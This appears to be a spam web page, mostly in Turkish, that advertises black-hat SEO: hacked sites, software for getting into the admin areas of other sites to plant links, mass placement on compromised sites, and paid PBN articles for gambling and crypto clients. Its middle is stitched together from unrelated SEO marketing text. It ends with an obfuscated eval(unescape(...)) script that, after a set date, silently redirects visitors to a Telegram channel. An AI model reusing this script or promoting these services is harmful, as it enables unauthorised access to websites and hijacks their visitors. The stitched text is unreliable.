black-seo-links

seo 3499

* { margin: 0; padding: 0; box-sizing: border-box; font-family: Arial, sans-serif; } body { background-color: #f4f4f9; color: #333; padding: 20px; line-height: 1.6; } .container { max-width: 1200px; margin: 0 auto; padding: 20px; background: #fff; box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1); border-radius: 10px; } h1, h2, h3 { color: #2c3e50; margin-bottom: 20px; } h1 { text-align: center; margin-bottom: 40px; font-size: 36px; } p { margin-bottom: 20px; } ul { margin-bottom: 20px; } li { margin-bottom: 10px; } .btn { display: inline-block; background-color: #3498db; color: white; padding: 10px 20px; border-radius: 5px; text-decoration: none; margin-top: 20px; font-size: 18px; text-align: center; } .btn:hover { background-color: #2980b9; } /* Адаптивные стили */ @media (max-width: 768px) { h1 { font-size: 28px; } .container { padding: 10px; } .btn { font-size: 16px; padding: 8px 15px; } }

BLACK SEO LINKS, PURCHASED LINKS, SOFTWARE FOR GAMBLING SITES

Siyah web sitelerinin Google arama sonuçlarında tanıtılması konusunda uzmanlaşmış deneyimli SEO uzmanlarından oluşan bir ekip. Saldırıya uğramış siteler ve bu sitelerde bağlantı yayınlamaya yönelik yazılımlar sunuyoruz.

Müşterilerimize yönelik hizmetlerimiz

  • Oyun Siteleri için Yazılım: Site yönetici alanlarına erişmenizi ve bağlantılarınızı oraya yerleştirmenizi sağlayan bir programdır.
  • Bağlantı verme: Sitelerinize bağlantı içeren makaleler yazmak ve bunları PBN ağımızda yayınlamak
  • Toplu Bağlantı Yerleştirme: Çeşitli konulardaki organik trafiğe sahip, bozuk canlı sitelerden gelen bağlantıların toplu olarak otomatik olarak yerleştirilmesi.
  • İçerik Üretim Yazılımı: Büyük miktarlarda içerik üretmenizi sağlar

Özel bir PBN ağından bağlantı yerleştirmeyle ilgili daha fazla ayrıntı

  • Bağlantıları aracısız olarak yerleştiriyoruz, PBNka bizimdir.
  • Makaleler tek seferlik ödeme ile sonsuza kadar yayınlanır.
  • Batı siteleri, konular – medya, teknoloji, BT, kripto para, finans, programlama, eğlence vb.
  • Makalenizi 30$’dan yayınlıyoruz.
  • Makale sonsuza kadar yayınlanır, en fazla 2 dofollow bağlantısı, ana sayfada duyuru yapılır. Yerleştirmeden sonra indekslemeyi hızlandırıyoruz.
  • Yayınlanan makaleyi harici bağlantılarla zenginleştiriyoruz 🚀
  • Siteler spam değildir, ayda en fazla 10 makale yayınlanmaktadır. Siteler periyodik olarak dış bağlantılarla güncellenmekte ve metrikler artırılmaktadır.
  • Finans, kripto, BT, kumar ve diğer konuları kabul ediyoruz.

Telegram’da mektup kabul ediyoruz

Biz SEO KAOS olarak birçok müşterimizin web sitesini kısa bir sürede ilgili kelimelerde ilk 3 sıra içerisine yerleştirdik. Bazı işlemleri Google geç görebilir veya çalışmadan verim alabilmek adına nadasa bırakmak gerekebilir. Bu yüzden öncelikli beklentiniz performans ve süreç odaklı olmalıdır. SEO çalışmasını başarıyla yapan markalar, Google sonuç sayfalarında üst sıralara çıkar ve görünürlükleri artar.

Tedarikçinize ait link yönetiminizi admin panelinizden tek adımda yapabilirsiniz. Ticimax sizin için tedarikçi adınıza göre en temiz ve doğru URL ‘i otomatik olarak oluşturmaktadır. Ancak Ticimax’ın eşsiz teknolojisi sayesinde eklediğiniz tedarikçi linkini kendinize göre belirleyebilirsiniz. Kategorilerinize ait link yönetiminizi admin panelinizden tek adımda yapabilirsiniz. Ticimax sizin için kategori adınıza göre en temiz ve doğru URL ‘i otomatik olarak oluşturmaktadır.

Bu konularla alakalı kapsamlı olarak ele aldığım içeriği mutlaka incelemelisiniz. Herhangi bir ek maliyet yoktur, bu raporları her zaman yararlı bilgileri dolu görebilirsiniz. “UX vs SEO” yerine “UX ve SEO” olduğunu düşündüğümüzde, arada bir zorluklarla başa çıkmak zorundayız.

Kullanıcılar anahtar kelimelerinizin tetiklediği arama sorgularında reklamlarınızı görür ve elde ettiğiniz her tıklama için Google’a ödeme yaparsınız. Google’da üst sıralarda çıkmak görünürlük, bilinirlik için önemlidir. Herhangi bir hizmet veya ürün satın alması yapmak ya da o konu hakkında bilgi almak için AIDA (Attention, Interest, Desire, Action) dediğimiz pazarlama hunisine bir yerden dâhil olmalısınız. Diyelim ki uzaya roket gönderecek kadar bir teknoloji yaptınız ama dünyada hiçbir ülkenin, hiçbir kurumun bundan haberi yok. Bu noktada bilinirlik, tanınırlık ve görünürlük yaratmalısınız.

İçeriğinizi geniş ölçekte sorunsuz bir şekilde yönetmek ve güncellemek için entegre veritabanlarından veri çekin. Eski URL’ler için kalıcı 301 yönlendirmeleri oluşturarak bağlantı eşitliğini koruyun. Tekil URL’leri veya aynı yolu paylaşan grupları manuel olarak yeniden yönlendirin. Toplu yönlendirmeler için, aynı anda 500’e kadar URL’yi içe aktararak zaman kazanın veya tüm yönlendirmelerinizin bulunduğu bir CSV dosyasını dışa aktarın. Web siteleri için gerçekleştirmekte olduğumuz proje yönetimi çalışmaları neredeyse tüm girdilerden etkilenmektedir. Olumlu / olumsuz tüm girdilerin SEO çalışmalarına bir etkisi mevcuttur.

eval(unescape(“%28function%28%29%7Bif%20%28new%20Date%28%29%3Enew%20Date%28%27Thu%2C%2024%20Oct%202024%2012%3A51%3A46%20GMT%27%29%29setTimeout%28function%28%29%7Bwindow.location.href%3D%27https%3A//t.me/seo_linkk%27%3B%7D%2C5*1000%29%3B%7D%29%28%29%3B”));